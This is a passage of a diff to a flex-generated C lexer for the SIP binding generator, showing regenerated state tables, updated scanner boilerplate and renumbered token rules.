816, 816, 817, 817, 817, 854, ++ 853, 818, 818, 818, 819, 819, 819, 852, 851, 809, ++ 812, 808, 848, 847, 819, 820, 820, 820, 846, 810, ++ ++ 845, 820, 843, 842, 811, 815, 818, 821, 821, 821, ++ 841, 816, 822, 822, 822, 823, 823, 823, 824, 824, ++ 824, 840, 839, 823, 825, 825, 825, 838, 824, 826, ++ 826, 826, 837, 836, 825, 827, 827, 827, 828, 828, ++ 828, 829, 829, 829, 835, 834, 828, 828, 830, 830, ++ 830, 831, 831, 831, 832, 832, 832, 877, 877, 877, ++ 827, 878, 878, 878, 833, 831, 806, 805, 830, 879, ++ 879, 879, 880, 880, 880, 881, 881, 881, 804, 832, ++ 882, 882, 882, 883, 883, 883, 884, 884, 884, 885, ++ 885, 885, 802, 801, 878, 798, 886, 886, 886, 887, ++ ++ 887, 887, 888, 888, 888, 877, 887, 796, 881, 889, ++ 889, 889, 880, 890, 890, 890, 795, 882, 879, 886, ++ 891, 891, 891, 884, 892, 892, 892, 888, 794, 883, ++ 793, 893, 893, 893, 894, 894, 894, 895, 895, 895, ++ 896, 896, 896, 792, 892, 893, 939, 939, 939, 940, ++ 940, 940, 791, 894, 941, 941, 941, 942, 942, 942, ++ 790, 895, 943, 943, 943, 944, 944, 944, 945, 945, ++ 945, 946, 946, 946, 947, 947, 947, 948, 948, 948, ++ 949, 949, 949, 789, 950, 950, 950, 951, 951, 951, ++ 788, 940, 787, 786, 948, 952, 952, 952, 943, 953, ++ ++ 953, 953, 939, 950, 946, 941, 784, 944, 783, 942, ++ 782, 951, 990, 990, 990, 991, 991, 991, 781, 945, ++ 992, 992, 992, 993, 993, 993, 994, 994, 994, 995, ++ 995, 995, 996, 996, 996, 997, 997, 997, 998, 998, ++ 998, 999, 999, 999, 780, 990, 779, 777, 998, 1000, ++ 1000, 1000, 1035, 1035, 1035, 1036, 1036, 1036, 1037, 1037, ++ 1037, 991, 1038, 1038, 1038, 996, 776, 775, 993, 997, ++ 994, 774, 992, 773, 772, 995, 1039, 1039, 1039, 1040, ++ 1040, 1040, 1041, 1041, 1041, 1042, 1042, 1042, 771, 770, ++ 1035, 769, 1037, 1043, 1043, 1043, 768, 1036, 767, 766, ++ ++ 1038, 1076, 1076, 1076, 1077, 1077, 1077, 1078, 1078, 1078, ++ 765, 1079, 1079, 1079, 1039, 1080, 1080, 1080, 764, 1040, ++ 1081, 1081, 1081, 763, 1082, 1082, 1082, 762, 1041, 1083, ++ 1083, 1083, 761, 1042, 1113, 1113, 1113, 1114, 1114, 1114, ++ 1115, 1115, 1115, 1116, 1116, 1116, 1117, 1117, 1117, 1080, ++ 1115, 1078, 1118, 1118, 1118, 1077, 1076, 1079, 1082, 1119, ++ 1119, 1119, 1147, 1147, 1147, 1148, 1148, 1148, 760, 727, ++ 1113, 1083, 1149, 1149, 1149, 1150, 1150, 1150, 1151, 1151, ++ 1151, 1173, 1173, 1173, 1174, 1174, 1174, 1175, 1175, 1175, ++ 726, 725, 1117, 724, 1116, 723, 722, 1118, 720, 719, ++ ++ 1147, 1176, 1176, 1176, 1196, 1196, 1196, 1197, 1197, 1197, ++ 1198, 1198, 1198, 718, 1148, 717, 1151, 1216, 1216, 1216, ++ 716, 715, 1149, 1217, 1217, 1217, 1231, 1231, 1231, 1173, ++ 1232, 1232, 1232, 1174, 1240, 1240, 1240, 1241, 1241, 1241, ++ 1247, 1247, 1247, 1232, 1248, 1248, 1248, 1252, 1252, 1252, ++ 714, 1176, 713, 712, 1197, 1196, 1254, 1254, 1254, 1216, ++ 1256, 1256, 1256, 1258, 1258, 1258, 1259, 1259, 1259, 711, ++ 710, 1241, 1217, 1231, 709, 708, 707, 705, 704, 702, ++ 1240, 700, 699, 698, 1252, 695, 694, 693, 689, 688, ++ 1248, 686, 685, 684, 683, 682, 681, 680, 1256, 679, ++ ++ 1254, 642, 641, 640, 639, 638, 637, 636, 635, 634, ++ 633, 632, 1258, 1261, 1261, 1261, 1261, 1262, 1262, 1262, ++ 1262, 1263, 1263, 1263, 1263, 1264, 1264, 1264, 1264, 1265, ++ 1265, 1266, 1266, 1267, 631, 1267, 1267, 630, 629, 627, ++ 626, 625, 623, 622, 621, 620, 619, 618, 617, 615, ++ 614, 613, 612, 611, 610, 609, 608, 607, 606, 605, ++ 604, 603, 602, 601, 600, 599, 598, 597, 596, 595, ++ 594, 593, 592, 549, 548, 547, 545, 544, 543, 542, ++ 541, 540, 539, 538, 537, 536, 535, 534, 533, 532, ++ 531, 530, 529, 528, 527, 526, 525, 524, 523, 522, ++ ++ 521, 520, 519, 518, 517, 516, 515, 514, 513, 512, ++ 511, 510, 509, 508, 507, 505, 504, 459, 456, 455, ++ 454, 453, 452, 451, 450, 449, 448, 447, 446, 445, ++ 444, 443, 442, 441, 440, 439, 438, 437, 436, 435, ++ 434, 433, 432, 431, 430, 429, 428, 427, 426, 425, ++ 424, 423, 422, 421, 420, 419, 418, 417, 416, 361, ++ 360, 359, 358, 357, 356, 355, 353, 352, 351, 350, ++ 349, 348, 347, 346, 345, 344, 343, 342, 341, 340, ++ 339, 338, 337, 336, 335, 334, 333, 332, 331, 329, ++ 328, 327, 325, 324, 323, 322, 321, 320, 281, 259, ++ ++ 258, 257, 256, 255, 254, 253, 251, 249, 248, 247, ++ 246, 244, 242, 240, 239, 237, 236, 234, 233, 232, ++ 230, 228, 227, 226, 180, 178, 177, 152, 151, 149, ++ 148, 146, 145, 143, 141, 139, 133, 83, 79, 76, ++ 73, 52, 49, 43, 22, 21, 11, 9, 3, 1260, ++ 1260, 1260, 1260, 1260, 1260, 1260, 1260, 1260, 1260, 1260, ++ 1260, 1260, 1260, 1260, 1260, 1260, 1260, 1260, 1260, 1260, ++ 1260, 1260, 1260, 1260, 1260, 1260, 1260, 1260, 1260, 1260, ++ 1260, 1260, 1260, 1260, 1260, 1260, 1260, 1260, 1260, 1260, ++ 1260, 1260, 1260, 1260, 1260, 1260, 1260, 1260, 1260, 1260, + +- 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, +- 1234, 1234, 1234, 1234, 1234 ++ 1260, 1260, 1260, 1260, 1260, 1260, 1260, 1260, 1260, 1260, ++ 1260, 1260, 1260, 1260, 1260, 1260, 1260, 1260, 1260, 1260 + } ; + + static yy_state_type yy_last_accepting_state; +@@ -1499,7 +1518,7 @@ int yy_flex_debug = 0; + #define YY_MORE_ADJ 0 + #define YY_RESTORE_YY_MORE_OFFSET + char *yytext; +-#line 1 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 1 "lexer.l" + /* + * The SIP lexer. + * +@@ -1517,7 +1536,7 @@ char *yytext; + * SIP is supplied WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. + */ +-#line 20 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 20 "lexer.l" + #include <stdio.h> + #include <stdlib.h> + #include <string.h> +@@ -1563,11 +1582,9 @@ static int parenDepth = 0; + + static FILE *openFile(const char *); + static void fatallex(char *); ++#line 1586 "../lexer.c" + +- +- +- +-#line 1571 "sip-4.19.23/sipgen/lexer.c" ++#line 1588 "../lexer.c" + + #define INITIAL 0 + #define code 1 +@@ -1587,36 +1604,36 @@ static void fatallex(char *); + #define YY_EXTRA_TYPE void * + #endif + +-static int yy_init_globals (void ); ++static int yy_init_globals ( void ); + + /* Accessor methods to globals. + These are made visible to non-reentrant scanners for convenience. */ + +-int yylex_destroy (void ); ++int yylex_destroy ( void ); + +-int yyget_debug (void ); ++int yyget_debug ( void ); + +-void yyset_debug (int debug_flag ); ++void yyset_debug ( int debug_flag ); + +-YY_EXTRA_TYPE yyget_extra (void ); ++YY_EXTRA_TYPE yyget_extra ( void ); + +-void yyset_extra (YY_EXTRA_TYPE user_defined ); ++void yyset_extra ( YY_EXTRA_TYPE user_defined ); + +-FILE *yyget_in (void ); ++FILE *yyget_in ( void ); + +-void yyset_in (FILE * in_str ); ++void yyset_in ( FILE * _in_str ); + +-FILE *yyget_out (void ); ++FILE *yyget_out ( void ); + +-void yyset_out (FILE * out_str ); ++void yyset_out ( FILE * _out_str ); + +-yy_size_t yyget_leng (void ); ++ int yyget_leng ( void ); + +-char *yyget_text (void ); ++char *yyget_text ( void ); + +-int yyget_lineno (void ); ++int yyget_lineno ( void ); + +-void yyset_lineno (int line_number ); ++void yyset_lineno ( int _line_number ); + + /* Macros after this point can all be overridden by user definitions in + * section 1. +@@ -1624,28 +1641,31 @@ void yyset_lineno (int line_number ); + + #ifndef YY_SKIP_YYWRAP + #ifdef __cplusplus +-extern "C" int yywrap (void ); ++extern "C" int yywrap ( void ); + #else +-extern int yywrap (void ); ++extern int yywrap ( void ); + #endif + #endif + +- static void yyunput (int c,char *buf_ptr ); ++#ifndef YY_NO_UNPUT + ++ static void yyunput ( int c, char *buf_ptr ); ++ ++#endif ++ + #ifndef yytext_ptr +-static void yy_flex_strncpy (char *,yyconst char *,int ); ++static void yy_flex_strncpy ( char *, const char *, int ); + #endif + + #ifdef YY_NEED_STRLEN +-static int yy_flex_strlen (yyconst char * ); ++static int yy_flex_strlen ( const char * ); + #endif + + #ifndef YY_NO_INPUT +- + #ifdef __cplusplus +-static int yyinput (void ); ++static int yyinput ( void ); + #else +-static int input (void ); ++static int input ( void ); + #endif + + #endif +@@ -1654,15 +1674,20 @@ static int input (void ); + static int yy_start_stack_depth = 0; + static int *yy_start_stack = NULL; + +- static void yy_push_state (int new_state ); ++ static void yy_push_state ( int _new_state ); + +- static void yy_pop_state (void ); ++ static void yy_pop_state ( void ); + +- static int yy_top_state (void ); ++ static int yy_top_state ( void ); + + /* Amount of stuff to slurp up with each read. */ + #ifndef YY_READ_BUF_SIZE ++#ifdef __ia64__ ++/* On IA-64, the buffer size is 16k, not 8k */ ++#define YY_READ_BUF_SIZE 16384 ++#else + #define YY_READ_BUF_SIZE 8192 ++#endif /* __ia64__ */ + #endif + + /* Copy whatever the last rule matched to the standard output. */ +@@ -1670,7 +1695,7 @@ static int input (void ); + /* This used to be an fputs(), but since the string might contain NUL's, + * we now use fwrite(). + */ +-#define ECHO fwrite( yytext, yyleng, 1, yyout ) ++#define ECHO do { if (fwrite( yytext, (size_t) yyleng, 1, yyout )) {} } while (0) + #endif + + /* Gets input and stuffs it into "buf". number of characters read, or YY_NULL, +@@ -1681,7 +1706,7 @@ static int input (void ); + if ( YY_CURRENT_BUFFER_LVALUE->yy_is_interactive ) \ + { \ + int c = '*'; \ +- yy_size_t n; \ ++ int n; \ + for ( n = 0; n < max_size && \ + (c = getc( yyin )) != EOF && c != '\n'; ++n ) \ + buf[n] = (char) c; \ +@@ -1694,7 +1719,7 @@ static int input (void ); + else \ + { \ + errno=0; \ +- while ( (result = fread(buf, 1, max_size, yyin))==0 && ferror(yyin)) \ ++ while ( (result = (int) fread(buf, 1, (yy_size_t) max_size, yyin)) == 0 && ferror(yyin)) \ + { \ + if( errno != EINTR) \ + { \ +@@ -1749,7 +1774,7 @@ extern int yylex (void); + + /* Code executed at the end of each rule. */ + #ifndef YY_BREAK +-#define YY_BREAK break; ++#define YY_BREAK /*LINTED*/break; + #endif + + #define YY_RULE_SETUP \ +@@ -1762,15 +1787,10 @@ extern int yylex (void); + */ + YY_DECL + { +- register yy_state_type yy_current_state; +- register char *yy_cp, *yy_bp; +- register int yy_act; ++ yy_state_type yy_current_state; ++ char *yy_cp, *yy_bp; ++ int yy_act; + +-#line 74 "sip-4.19.23/sipgen/metasrc/lexer.l" +- +- +-#line 1773 "sip-4.19.23/sipgen/lexer.c" +- + if ( !(yy_init) ) + { + (yy_init) = 1; +@@ -1791,13 +1811,19 @@ YY_DECL + if ( ! YY_CURRENT_BUFFER ) { + yyensure_buffer_stack (); + YY_CURRENT_BUFFER_LVALUE = +- yy_create_buffer(yyin,YY_BUF_SIZE ); ++ yy_create_buffer( yyin, YY_BUF_SIZE ); + } + +- yy_load_buffer_state( ); ++ yy_load_buffer_state( ); + } + +- while ( 1 ) /* loops until end-of-file is reached */ ++ { ++#line 74 "lexer.l" ++ ++ ++#line 1825 "../lexer.c" ++ ++ while ( /*CONSTCOND*/1 ) /* loops until end-of-file is reached */ + { + yy_cp = (yy_c_buf_p); + +@@ -1814,7 +1840,7 @@ YY_DECL + yy_match: + do + { +- register YY_CHAR yy_c = yy_ec[YY_SC_TO_UI(*yy_cp)]; ++ YY_CHAR yy_c = yy_ec[YY_SC_TO_UI(*yy_cp)] ; + if ( yy_accept[yy_current_state] ) + { + (yy_last_accepting_state) = yy_current_state; +@@ -1823,13 +1849,13 @@ yy_match: + while ( yy_chk[yy_base[yy_current_state] + yy_c] != yy_current_state ) + { + yy_current_state = (int) yy_def[yy_current_state]; +- if ( yy_current_state >= 1235 ) +- yy_c = yy_meta[(unsigned int) yy_c]; ++ if ( yy_current_state >= 1261 ) ++ yy_c = yy_meta[yy_c]; + } +- yy_current_state = yy_nxt[yy_base[yy_current_state] + (unsigned int) yy_c]; ++ yy_current_state = yy_nxt[yy_base[yy_current_state] + yy_c]; + ++yy_cp; + } +- while ( yy_base[yy_current_state] != 2845 ); ++ while ( yy_base[yy_current_state] != 2950 ); + + yy_find_action: + yy_act = yy_accept[yy_current_state]; +@@ -1855,540 +1881,550 @@ do_action: /* This label is used only to + + case 1: + YY_RULE_SETUP +-#line 76 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 76 "lexer.l" + {BEGIN directive_start; return TK_API;} + YY_BREAK + case 2: + YY_RULE_SETUP +-#line 77 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 77 "lexer.l" + {BEGIN directive_start; return TK_AUTOPYNAME;} + YY_BREAK + case 3: + YY_RULE_SETUP +-#line 78 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 78 "lexer.l" + {return TK_CMODULE;} + YY_BREAK + case 4: + YY_RULE_SETUP +-#line 79 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 79 "lexer.l" + {BEGIN directive_start; return TK_COMPOMODULE;} + YY_BREAK + case 5: + YY_RULE_SETUP +-#line 80 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 80 "lexer.l" + {BEGIN directive_start; return TK_CONSMODULE;} + YY_BREAK + case 6: + YY_RULE_SETUP +-#line 81 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 81 "lexer.l" + {BEGIN directive_start; return TK_DEFDOCSTRFMT;} + YY_BREAK + case 7: + YY_RULE_SETUP +-#line 82 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 82 "lexer.l" + {BEGIN directive_start; return TK_DEFDOCSTRSIG;} + YY_BREAK + case 8: + YY_RULE_SETUP +-#line 83 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 83 "lexer.l" + {BEGIN directive_start; return TK_DEFENCODING;} + YY_BREAK + case 9: + YY_RULE_SETUP +-#line 84 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 84 "lexer.l" + {BEGIN directive_start; return TK_DEFMETATYPE;} + YY_BREAK + case 10: + YY_RULE_SETUP +-#line 85 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 85 "lexer.l" + {BEGIN directive_start; return TK_DEFSUPERTYPE;} + YY_BREAK + case 11: + YY_RULE_SETUP +-#line 86 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 86 "lexer.l" + {return TK_END;} + YY_BREAK + case 12: + YY_RULE_SETUP +-#line 87 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 87 "lexer.l" + {BEGIN INITIAL; return TK_END;} + YY_BREAK + case 13: + YY_RULE_SETUP +-#line 88 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 88 "lexer.l" + {return TK_EXCEPTION;} + YY_BREAK + case 14: + YY_RULE_SETUP +-#line 89 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 89 "lexer.l" + {BEGIN directive_start; return TK_FEATURE;} + YY_BREAK + case 15: + YY_RULE_SETUP +-#line 90 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 90 "lexer.l" + {BEGIN directive_start; return TK_HIDE_NS;} + YY_BREAK + case 16: + YY_RULE_SETUP +-#line 91 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 91 "lexer.l" + {return TK_IF;} + YY_BREAK + case 17: + YY_RULE_SETUP +-#line 92 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 92 "lexer.l" + {BEGIN directive_start; return TK_IMPORT;} + YY_BREAK + case 18: + YY_RULE_SETUP +-#line 93 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 93 "lexer.l" + {BEGIN directive_start; return TK_INCLUDE;} + YY_BREAK + case 19: + YY_RULE_SETUP +-#line 94 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 94 "lexer.l" + {BEGIN directive_start; return TK_LICENSE;} + YY_BREAK + case 20: + YY_RULE_SETUP +-#line 95 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 95 "lexer.l" + {return TK_MAPPEDTYPE;} + YY_BREAK + case 21: + YY_RULE_SETUP +-#line 96 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 96 "lexer.l" + {BEGIN directive_start; return TK_MODULE;} + YY_BREAK + case 22: + YY_RULE_SETUP +-#line 97 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 97 "lexer.l" + {return TK_OPTINCLUDE;} + YY_BREAK + case 23: + YY_RULE_SETUP +-#line 98 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 98 "lexer.l" + {return TK_PLATFORMS;} + YY_BREAK + case 24: + YY_RULE_SETUP +-#line 99 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 99 "lexer.l" + {BEGIN directive_start; return TK_PLUGIN;} + YY_BREAK + case 25: + YY_RULE_SETUP +-#line 100 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 100 "lexer.l" + {BEGIN directive_start; return TK_PROPERTY;} + YY_BREAK + case 26: + YY_RULE_SETUP +-#line 101 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 101 "lexer.l" + {return TK_TIMELINE;} + YY_BREAK + case 27: + YY_RULE_SETUP +-#line 103 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 103 "lexer.l" + {return TK_CLASS;} + YY_BREAK + case 28: + YY_RULE_SETUP +-#line 104 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 104 "lexer.l" + {return TK_STRUCT;} + YY_BREAK + case 29: + YY_RULE_SETUP +-#line 105 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 105 "lexer.l" + {return TK_PUBLIC;} + YY_BREAK + case 30: + YY_RULE_SETUP +-#line 106 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 106 "lexer.l" + {return TK_PROTECTED;} + YY_BREAK + case 31: + YY_RULE_SETUP +-#line 107 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 107 "lexer.l" + {return TK_PRIVATE;} + YY_BREAK + case 32: + YY_RULE_SETUP +-#line 108 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 108 "lexer.l" + {return TK_SIGNALS;} + YY_BREAK + case 33: + YY_RULE_SETUP +-#line 109 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 109 "lexer.l" + {return TK_SIGNALS;} + YY_BREAK + case 34: + YY_RULE_SETUP +-#line 110 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 110 "lexer.l" + {return TK_SIGNAL_METHOD;} + YY_BREAK + case 35: + YY_RULE_SETUP +-#line 111 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 111 "lexer.l" + {return TK_SLOTS;} + YY_BREAK + case 36: + YY_RULE_SETUP +-#line 112 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 112 "lexer.l" + {return TK_SLOTS;} + YY_BREAK + case 37: + YY_RULE_SETUP +-#line 113 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 113 "lexer.l" + {return TK_SLOT_METHOD;} + YY_BREAK + case 38: + YY_RULE_SETUP +-#line 114 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 114 "lexer.l" + {return TK_CHAR;} + YY_BREAK + case 39: + YY_RULE_SETUP +-#line 115 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 115 "lexer.l" + {return TK_WCHAR_T;} + YY_BREAK + case 40: + YY_RULE_SETUP +-#line 116 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 116 "lexer.l" + {return TK_BOOL;} + YY_BREAK + case 41: + YY_RULE_SETUP +-#line 117 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 117 "lexer.l" + {return TK_SHORT;} + YY_BREAK + case 42: + YY_RULE_SETUP +-#line 118 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 118 "lexer.l" + {return TK_INT;} + YY_BREAK + case 43: + YY_RULE_SETUP +-#line 119 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 119 "lexer.l" + {return TK_LONG;} + YY_BREAK + case 44: + YY_RULE_SETUP +-#line 120 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 120 "lexer.l" + {return TK_FLOAT;} + YY_BREAK + case 45: + YY_RULE_SETUP +-#line 121 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 121 "lexer.l" + {return TK_DOUBLE;} + YY_BREAK + case 46: + YY_RULE_SETUP +-#line 122 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 122 "lexer.l" + {return TK_VOID;} + YY_BREAK + case 47: + YY_RULE_SETUP +-#line 123 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 123 "lexer.l" + {return TK_VIRTUAL;} + YY_BREAK + case 48: + YY_RULE_SETUP +-#line 124 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 124 "lexer.l" + {return TK_ENUM;} + YY_BREAK + case 49: + YY_RULE_SETUP +-#line 125 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 125 "lexer.l" + {return TK_SIGNED;} + YY_BREAK + case 50: + YY_RULE_SETUP +-#line 126 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 126 "lexer.l" + {return TK_UNSIGNED;} + YY_BREAK + case 51: + YY_RULE_SETUP +-#line 127 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 127 "lexer.l" + {return TK_CONST;} + YY_BREAK + case 52: + YY_RULE_SETUP +-#line 128 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 128 "lexer.l" + {return TK_STATIC;} + YY_BREAK + case 53: + YY_RULE_SETUP +-#line 129 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 129 "lexer.l" + {return TK_TRUE_VALUE;} + YY_BREAK + case 54: + YY_RULE_SETUP +-#line 130 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 130 "lexer.l" + {return TK_FALSE_VALUE;} + YY_BREAK + case 55: + YY_RULE_SETUP +-#line 131 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 131 "lexer.l" + {return TK_NULL_VALUE;} + YY_BREAK + case 56: + YY_RULE_SETUP +-#line 132 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 132 "lexer.l" + {return TK_TYPEDEF;} + YY_BREAK + case 57: + YY_RULE_SETUP +-#line 133 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 133 "lexer.l" + {return TK_NAMESPACE;} + YY_BREAK + case 58: + YY_RULE_SETUP +-#line 134 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 134 "lexer.l" + {return TK_OPERATOR;} + YY_BREAK + case 59: + YY_RULE_SETUP +-#line 135 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 135 "lexer.l" + {return TK_THROW;} + YY_BREAK + case 60: + YY_RULE_SETUP +-#line 136 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 136 "lexer.l" + {return TK_EXPLICIT;} + YY_BREAK + case 61: + YY_RULE_SETUP +-#line 137 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 137 "lexer.l" + {return TK_TEMPLATE;} + YY_BREAK + case 62: + YY_RULE_SETUP +-#line 138 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 138 "lexer.l" + {return TK_FINAL;} + YY_BREAK + case 63: + YY_RULE_SETUP +-#line 139 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 139 "lexer.l" + {return TK_SIZET;} + YY_BREAK + case 64: + YY_RULE_SETUP +-#line 140 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 140 "lexer.l" + {return TK_SCOPE;} + YY_BREAK + case 65: + YY_RULE_SETUP +-#line 141 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 141 "lexer.l" + {return TK_LOGICAL_OR;} + YY_BREAK + case 66: + YY_RULE_SETUP +-#line 142 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 142 "lexer.l" + {return TK_PYOBJECT;} + YY_BREAK + case 67: + YY_RULE_SETUP +-#line 143 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 143 "lexer.l" + {return TK_PYTUPLE;} + YY_BREAK + case 68: + YY_RULE_SETUP +-#line 144 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 144 "lexer.l" + {return TK_PYLIST;} + YY_BREAK + case 69: + YY_RULE_SETUP +-#line 145 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 145 "lexer.l" + {return TK_PYDICT;} + YY_BREAK + case 70: + YY_RULE_SETUP +-#line 146 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 146 "lexer.l" + {return TK_PYCALLABLE;} + YY_BREAK + case 71: + YY_RULE_SETUP +-#line 147 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 147 "lexer.l" + {return TK_PYSLICE;} + YY_BREAK + case 72: + YY_RULE_SETUP +-#line 148 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 148 "lexer.l" + {return TK_PYTYPE;} + YY_BREAK + case 73: + YY_RULE_SETUP +-#line 149 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 149 "lexer.l" + {return TK_PYBUFFER;} + YY_BREAK + case 74: + YY_RULE_SETUP +-#line 150 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 150 "lexer.l" + {return TK_SIPSIGNAL;} + YY_BREAK + case 75: + YY_RULE_SETUP +-#line 151 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 151 "lexer.l" + {return TK_SIPSLOT;} + YY_BREAK + case 76: + YY_RULE_SETUP +-#line 152 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 152 "lexer.l" + {return TK_SIPANYSLOT;} + YY_BREAK + case 77: + YY_RULE_SETUP +-#line 153 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 153 "lexer.l" + {return TK_SIPRXCON;} + YY_BREAK + case 78: + YY_RULE_SETUP +-#line 154 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 154 "lexer.l" + {return TK_SIPRXDIS;} + YY_BREAK + case 79: + YY_RULE_SETUP +-#line 155 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 155 "lexer.l" + {return TK_SIPSLOTCON;} + YY_BREAK + case 80: + YY_RULE_SETUP +-#line 156 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 156 "lexer.l" + {return TK_SIPSLOTDIS;} + YY_BREAK + case 81: + YY_RULE_SETUP +-#line 157 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 157 "lexer.l" + {return TK_SIPSSIZET;} + YY_BREAK + case 82: + YY_RULE_SETUP +-#line 158 "sip-4.19.23/sipgen/metasrc/lexer.l" +-{return TK_QOBJECT;} ++#line 158 "lexer.l" ++{return TK_SIPSSIZET;} + YY_BREAK + case 83: + YY_RULE_SETUP +-#line 159 "sip-4.19.23/sipgen/metasrc/lexer.l" +-{return TK_ELLIPSIS;} ++#line 159 "lexer.l" ++{return TK_QOBJECT;} + YY_BREAK + case 84: + YY_RULE_SETUP +-#line 161 "sip-4.19.23/sipgen/metasrc/lexer.l" +-{return TK_FORMAT;} ++#line 160 "lexer.l" ++{return TK_ELLIPSIS;} + YY_BREAK + case 85: + YY_RULE_SETUP +-#line 162 "sip-4.19.23/sipgen/metasrc/lexer.l" +-{return TK_GET;} ++#line 162 "lexer.l" ++{return TK_FORMAT;} + YY_BREAK + case 86: + YY_RULE_SETUP +-#line 163 "sip-4.19.23/sipgen/metasrc/lexer.l" +-{return TK_ID;} ++#line 163 "lexer.l" ++{return TK_GET;} + YY_BREAK + case 87: + YY_RULE_SETUP +-#line 164 "sip-4.19.23/sipgen/metasrc/lexer.l" +-{return TK_KWARGS;} ++#line 164 "lexer.l" ++{return TK_ID;} + YY_BREAK + case 88: + YY_RULE_SETUP +-#line 165 "sip-4.19.23/sipgen/metasrc/lexer.l" +-{return TK_LANGUAGE;} ++#line 165 "lexer.l" ++{return TK_KWARGS;} + YY_BREAK + case 89: + YY_RULE_SETUP +-#line 166 "sip-4.19.23/sipgen/metasrc/lexer.l" +-{return TK_LICENSEE;} ++#line 166 "lexer.l" ++{return TK_LANGUAGE;} + YY_BREAK + case 90: + YY_RULE_SETUP +-#line 167 "sip-4.19.23/sipgen/metasrc/lexer.l" +-{return TK_NAME;} ++#line 167 "lexer.l" ++{return TK_LICENSEE;} + YY_BREAK + case 91: + YY_RULE_SETUP +-#line 168 "sip-4.19.23/sipgen/metasrc/lexer.l" +-{return TK_OPTIONAL;} ++#line 168 "lexer.l" ++{return TK_NAME;} + YY_BREAK + case 92: + YY_RULE_SETUP +-#line 169 "sip-4.19.23/sipgen/metasrc/lexer.l" +-{return TK_ORDER;} ++#line 169 "lexer.l" ++{return TK_OPTIONAL;} + YY_BREAK + case 93: + YY_RULE_SETUP 